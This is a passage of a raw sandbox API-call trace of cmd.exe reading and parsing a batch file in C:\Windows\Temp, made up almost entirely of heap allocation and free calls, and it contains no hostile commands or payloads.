_Buffer="00000000") returned 8 [0177.993] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.993] GetProcessHeap () returned 0x19a8f1e0000 [0177.994] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0177.994] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0177.994] GetProcessHeap () returned 0x19a8f1e0000 [0177.994] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f20d9b0 [0177.994] memcpy (in: _Dst=0x19a8f20d9b0, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f20d9b0) returned 0x19a8f20d9b0 [0177.994] FreeEnvironmentStringsA (penv="=") returned 1 [0177.994] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.994] GetProcessHeap () returned 0x19a8f1e0000 [0177.994] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0177.995] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0177.995] GetProcessHeap () returned 0x19a8f1e0000 [0177.995] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f20d9b0 [0177.995] memcpy (in: _Dst=0x19a8f20d9b0, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f20d9b0) returned 0x19a8f20d9b0 [0177.995] FreeEnvironmentStringsA (penv="=") returned 1 [0177.995] GetProcessHeap () returned 0x19a8f1e0000 [0177.995] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd80) returned 1 [0177.995] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe630 | out: lpAttributeList=0x43f9efe630) [0177.995] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0177.995] _close (_FileHandle=3) returned 0 [0177.995] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.995] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.996] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.996] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.996] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.996] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.996] SetConsoleInputExeNameW () returned 0x1 [0177.996] GetConsoleOutputCP () returned 0x1b5 [0177.997] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.997] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.997] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0177.997] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0177.997] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.997] SetFilePointer (in: hFile=0x90, lDistanceToMove=5713, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1651 [0177.997] GetProcessHeap () returned 0x19a8f1e0000 [0177.998] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0177.998] GetProcessHeap () returned 0x19a8f1e0000 [0177.998] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0177.998] GetProcessHeap () returned 0x19a8f1e0000 [0177.999] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb4f0) returned 1 [0177.999] GetProcessHeap () returned 0x19a8f1e0000 [0177.999] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200de0) returned 1 [0177.999] GetProcessHeap () returned 0x19a8f1e0000 [0178.000] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efe50) returned 1 [0178.000] GetProcessHeap () returned 0x19a8f1e0000 [0178.000] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d150) returned 1 [0178.000] GetProcessHeap () returned 0x19a8f1e0000 [0178.000] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0090) returned 1 [0178.000] GetProcessHeap () returned 0x19a8f1e0000 [0178.001] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0300) returned 1 [0178.001] GetProcessHeap () returned 0x19a8f1e0000 [0178.001] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0178.001] GetProcessHeap () returned 0x19a8f1e0000 [0178.001] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff910) returned 1 [0178.001] GetProcessHeap () returned 0x19a8f1e0000 [0178.001] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe050) returned 1 [0178.001] GetProcessHeap () returned 0x19a8f1e0000 [0178.002] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200450) returned 1 [0178.002] GetProcessHeap () returned 0x19a8f1e0000 [0178.002] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.002] GetProcessHeap () returned 0x19a8f1e0000 [0178.002] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0178.002] GetProcessHeap () returned 0x19a8f1e0000 [0178.003] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0178.003] GetProcessHeap () returned 0x19a8f1e0000 [0178.003] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8940) returned 1 [0178.003] GetProcessHeap () returned 0x19a8f1e0000 [0178.003] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0178.003] GetProcessHeap () returned 0x19a8f1e0000 [0178.003] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0178.003] GetProcessHeap () returned 0x19a8f1e0000 [0178.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0178.004] GetProcessHeap () returned 0x19a8f1e0000 [0178.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0178.004] GetProcessHeap () returned 0x19a8f1e0000 [0178.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0178.004] GetProcessHeap () returned 0x19a8f1e0000 [0178.004] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0178.004] GetProcessHeap () returned 0x19a8f1e0000 [0178.005] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0178.005] GetProcessHeap () returned 0x19a8f1e0000 [0178.005] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0178.005] GetProcessHeap () returned 0x19a8f1e0000 [0178.005] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0178.005] GetProcessHeap () returned 0x19a8f1e0000 [0178.005] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0178.005] GetProcessHeap () returned 0x19a8f1e0000 [0178.006] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb40) returned 1 [0178.006] GetProcessHeap () returned 0x19a8f1e0000 [0178.006] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0178.006] GetProcessHeap () returned 0x19a8f1e0000 [0178.006] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0178.006] GetProcessHeap () returned 0x19a8f1e0000 [0178.006] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0178.006] GetProcessHeap () returned 0x19a8f1e0000 [0178.006] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7c0) returned 1 [0178.006] GetProcessHeap () returned 0x19a8f1e0000 [0178.006] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0178.006] GetProcessHeap () returned 0x19a8f1e0000 [0178.007] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0178.007] GetProcessHeap () returned 0x19a8f1e0000 [0178.007] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0178.007] GetProcessHeap () returned 0x19a8f1e0000 [0178.007] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0178.007] GetProcessHeap () returned 0x19a8f1e0000 [0178.008] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cb0) returned 1 [0178.008] GetProcessHeap () returned 0x19a8f1e0000 [0178.008] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0178.008] GetProcessHeap () returned 0x19a8f1e0000 [0178.008] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0178.008] GetProcessHeap () returned 0x19a8f1e0000 [0178.008] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0178.008] GetProcessHeap () returned 0x19a8f1e0000 [0178.009] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0178.009] GetProcessHeap () returned 0x19a8f1e0000 [0178.009] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0178.009] GetProcessHeap () returned 0x19a8f1e0000 [0178.009] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb20) returned 1 [0178.009] GetProcessHeap () returned 0x19a8f1e0000 [0178.009] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0178.009] GetProcessHeap () returned 0x19a8f1e0000 [0178.009] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0178.009] GetProcessHeap () returned 0x19a8f1e0000 [0178.009] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0178.010] GetProcessHeap () returned 0x19a8f1e0000 [0178.010] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0178.010] GetProcessHeap () returned 0x19a8f1e0000 [0178.010] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0178.010] GetProcessHeap () returned 0x19a8f1e0000 [0178.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0178.011] GetProcessHeap () returned 0x19a8f1e0000 [0178.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec760) returned 1 [0178.011] GetProcessHeap () returned 0x19a8f1e0000 [0178.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0178.011] GetProcessHeap () returned 0x19a8f1e0000 [0178.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0178.011] GetProcessHeap () returned 0x19a8f1e0000 [0178.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd60) returned 1 [0178.011] GetProcessHeap () returned 0x19a8f1e0000 [0178.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0fb0) returned 1 [0178.012] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.012] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1651 [0178.012] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.012] SetFilePointer (in: hFile=0x90, lDistanceToMove=5715, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1653 [0178.012] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\no MASend\r\n, right click on this script and select 'Run as administrator'.\r\nnas\" && exit /b\r\n===========================================\r\n") returned 2 [0178.012] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.012] GetFileType (hFile=0x90) returned 0x1 [0178.012] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.012] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1653 [0178.012] GetProcessHeap () returned 0x19a8f1e0000 [0178.012] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.012] GetProcessHeap () returned 0x19a8f1e0000 [0178.013] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.013] _tell (_FileHandle=3) returned 5715 [0178.013] _close (_FileHandle=3) returned 0 [0178.013] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.013] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.013] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.013] SetFilePointer (in: hFile=0x90, lDistanceToMove=5715, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1653 [0178.014] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.014] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1653 [0178.014] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.014] SetFilePointer (in: hFile=0x90, lDistanceToMove=5782, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1696 [0178.014] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist \"%SystemRoot%\\Temp\\\" mkdir \"%SystemRoot%\\Temp\" %nul%\r\n", cbMultiByte=67, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if not exist \"%SystemRoot%\\Temp\\\" mkdir \"%SystemRoot%\\Temp\" %nul%\r\nstrator'.\r\nnas\" && exit /b\r\n===========================================\r\n") returned 67 [0178.014] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.014] GetFileType (hFile=0x90) returned 0x1 [0178.014] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.014] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1696 [0178.014] GetProcessHeap () returned 0x19a8f1e0000 [0178.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.014] GetProcessHeap () returned 0x19a8f1e0000 [0178.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.016] GetProcessHeap () returned 0x19a8f1e0000 [0178.016] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb6b0 [0178.016] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0178.016] GetProcessHeap () returned 0x19a8f1e0000 [0178.016] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0178.016] GetProcessHeap () returned 0x19a8f1e0000 [0178.017] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.017] GetProcessHeap () returned 0x19a8f1e0000 [0178.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.017] GetProcessHeap () returned 0x19a8f1e0000 [0178.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb740 [0178.017] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0178.017] GetProcessHeap () returned 0x19a8f1e0000 [0178.017] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0178.017] GetProcessHeap () returned 0x19a8f1e0000 [0178.018] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.018] GetProcessHeap () returned 0x19a8f1e0000 [0178.018] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.018] GetProcessHeap () returned 0x19a8f1e0000 [0178.018] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecbe0 [0178.018] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0178.018] GetProcessHeap () returned 0x19a8f1e0000 [0178.018] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbe0) returned 1 [0178.018] GetProcessHeap () returned 0x19a8f1e0000 [0178.018] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.019] GetProcessHeap () returned 0x19a8f1e0000 [0178.019] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.020] _wcsicmp (_String1="if", _String2=")") returned 64 [0178.020] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0178.020] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0178.020] _wcsicmp (_String1="IF", _String2="if") returned 0 [0178.020] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0178.020] GetProcessHeap () returned 0x19a8f1e0000 [0178.020] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0178.020] GetProcessHeap () returned 0x19a8f1e0000 [0178.020] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1eca40 [0178.020] GetProcessHeap () returned 0x19a8f1e0000 [0178.020] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb6b0 [0178.020] GetProcessHeap () returned 0x19a8f1e0000 [0178.020] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb6b0, Size=0x1a) returned 0x19a8f1eb800 [0178.020] GetProcessHeap () returned 0x19a8f1e0000 [0178.020] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x1a [0178.020] _wcsicmp (_String1="not", _String2="/I") returned 63 [0178.020] GetProcessHeap () returned 0x19a8f1e0000 [0178.020] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0178.020] GetProcessHeap () returned 0x19a8f1e0000 [0178.020] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecda0 [0178.020] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0178.020] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0178.020] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0178.020] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0178.021] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.021] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.021] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0178.021] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0178.021] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.021] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x36) returned 0x19a8f1e0bf0 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.021] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x5c) returned 0x19a8f1eaed0 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.021] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0x38) returned 0x19a8f1eaed0 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.021] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0x38 [0178.021] _wcsicmp (_String1="mkdir", _String2=")") returned 68 [0178.021] _wcsicmp (_String1="FOR", _String2="mkdir") returned -7 [0178.021] _wcsicmp (_String1="FOR/?", _String2="mkdir") returned -7 [0178.021] _wcsicmp (_String1="IF", _String2="mkdir") returned -4 [0178.021] _wcsicmp (_String1="IF/?", _String2="mkdir") returned -4 [0178.021] _wcsicmp (_String1="REM", _String2="mkdir") returned 5 [0178.021] _wcsicmp (_String1="REM/?", _String2="mkdir") returned 5 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.021] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0178.021] GetProcessHeap () returned 0x19a8f1e0000 [0178.022] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0178.022] GetProcessHeap () returned 0x19a8f1e0000 [0178.022] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b70 [0178.022] GetProcessHeap () returned 0x19a8f1e0000 [0178.022] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0df0 [0178.022] GetProcessHeap () returned 0x19a8f1e0000 [0178.022] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eccc0 [0178.022] GetProcessHeap () returned 0x19a8f1e0000 [0178.022] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0f70 [0178.022] GetProcessHeap () returned 0x19a8f1e0000 [0178.022] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecbe0 [0178.022] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0178.022] _tell (_FileHandle=3) returned 5782 [0178.022] _close (_FileHandle=3) returned 0 [0178.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\", nBufferLength=0x208, lpBuffer=0x43f9efea40, lpFilePart=0x43f9efe7e0 | out: lpBuffer="C:\\Windows\\Temp\\", lpFilePart=0x43f9efe7e0*=0x0) returned 0x10 [0178.023] wcsncmp (_String1="C:\\W", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0178.023] GetFileAttributesW (lpFileName="C:\\Windows\\Temp\\" (normalized: "c:\\windows\\temp")) returned 0x10 [0178.023] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.023] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0178.024] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.024] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0178.024] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.024] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.025] SetConsoleInputExeNameW () returned 0x1 [0178.025] GetConsoleOutputCP () returned 0x1b5 [0178.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.026] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.026] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.026] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.026] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.027] SetFilePointer (in: hFile=0x90, lDistanceToMove=5782, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1696 [0178.027] GetProcessHeap () returned 0x19a8f1e0000 [0178.027] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbe0) returned 1 [0178.027] GetProcessHeap () returned 0x19a8f1e0000 [0178.027] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f70) returned 1 [0178.027] GetProcessHeap () returned 0x19a8f1e0000 [0178.027] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eccc0) returned 1 [0178.027] GetProcessHeap () returned 0x19a8f1e0000 [0178.027] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0df0) returned 1 [0178.028] GetProcessHeap () returned 0x19a8f1e0000 [0178.028] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b70) returned 1 [0178.028] GetProcessHeap () returned 0x19a8f1e0000 [0178.028] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.028] GetProcessHeap () returned 0x19a8f1e0000 [0178.028] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0178.028] GetProcessHeap () returned 0x19a8f1e0000 [0178.029] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0178.029] GetProcessHeap () returned 0x19a8f1e0000 